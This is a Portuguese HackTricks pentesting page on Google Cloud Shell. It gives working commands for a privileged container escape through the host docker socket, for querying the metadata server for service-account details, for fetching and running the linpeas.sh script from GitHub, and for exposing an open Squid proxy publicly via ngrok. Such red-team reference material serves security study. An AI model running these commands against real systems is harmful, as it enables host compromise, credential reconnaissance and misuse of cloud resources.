Aprenda hacking na AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert) ! Outras maneiras de apoiar o HackTricks:
Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Verifique os PLANOS DE ASSINATURA !
Cloud Shell
Para mais informações sobre o Cloud Shell, verifique:
Escape de Contêiner
Observe que o Google Cloud Shell é executado dentro de um contêiner, você pode escapar facilmente para o host fazendo:
Copiar sudo docker -H unix:///google/host/var/run/docker.sock pull alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock run -d -it --name escaper -v "/proc:/host/proc" -v "/sys:/host/sys" -v "/:/rootfs" --network=host --privileged=true --cap-add=ALL alpine:latest
sudo docker -H unix:///google/host/var/run/docker.sock start escaper
sudo docker -H unix:///google/host/var/run/docker.sock exec -it escaper /bin/sh
Isso não é considerado uma vulnerabilidade pelo Google, mas lhe dá uma visão mais ampla do que está acontecendo nesse ambiente.
Além disso, observe que a partir do host você pode encontrar um token de conta de serviço:
Copiar wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/"
default/
vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/
Com os seguintes escopos:
Copiar wget -q -O - --header "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/service-accounts/vms-cs-europe-west1-iuzs@m76c8cac3f3880018-tp.iam.gserviceaccount.com/scopes"
https://www.googleapis.com/auth/devstorage.read_only
https://www.googleapis.com/auth/logging.write
https://www.googleapis.com/auth/monitoring.write
Enumerar metadados com LinPEAS:
Copiar cd /tmp
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
sh linpeas.sh -o cloud
Depois de usar https://github.com/carlospolop/bf_my_gcp_permissions com o token da Conta de Serviço nenhuma permissão foi descoberta ...
Use-o como Proxy
Se deseja usar a instância do seu shell do Google Cloud como proxy, precisa executar os seguintes comandos (ou inseri-los no arquivo .bashrc):
Copiar sudo apt install -y squid
Apenas para informar, o Squid é um servidor proxy http. Crie um arquivo squid.conf com as seguintes configurações:
Copiar http_port 3128
cache_dir /var/cache/squid 100 16 256
acl all src 0.0 .0.0/0
http_access allow all
copie o arquivo squid.conf para /etc/squid
Copiar sudo cp squid.conf /etc/squid
Por fim, execute o serviço squid:
Copiar sudo service squid start
Use o ngrok para permitir que o proxy esteja disponível externamente:
Após executar, copie o url tcp://. Se deseja executar o proxy a partir de um navegador, é sugerido remover a parte tcp:// e a porta e colocar a porta no campo de porta das configurações de proxy do seu navegador (o squid é um servidor de proxy http).
Para um melhor uso na inicialização, o arquivo .bashrc deve ter as seguintes linhas:
Copiar sudo apt install -y squid
sudo cp squid.conf /etc/squid/
sudo service squid start
cd ngrok ; ./ngrok tcp 3128
As instruções foram copiadas de https://github.com/FrancescoDiSalesGithub/Google-cloud-shell-hacking?tab=readme-ov-file#ssh-on-the-google-cloud-shell-using-the-private-key . Verifique essa página para outras ideias malucas de executar qualquer tipo de software (bancos de dados e até mesmo o Windows) no Cloud Shell.
Aprenda hacking AWS do zero ao herói com htARTE (HackTricks AWS Red Team Expert) ! Outras maneiras de apoiar o HackTricks:
Se você deseja ver sua empresa anunciada no HackTricks ou baixar o HackTricks em PDF Confira os PLANOS DE ASSINATURA !
Última actualización hace 3 meses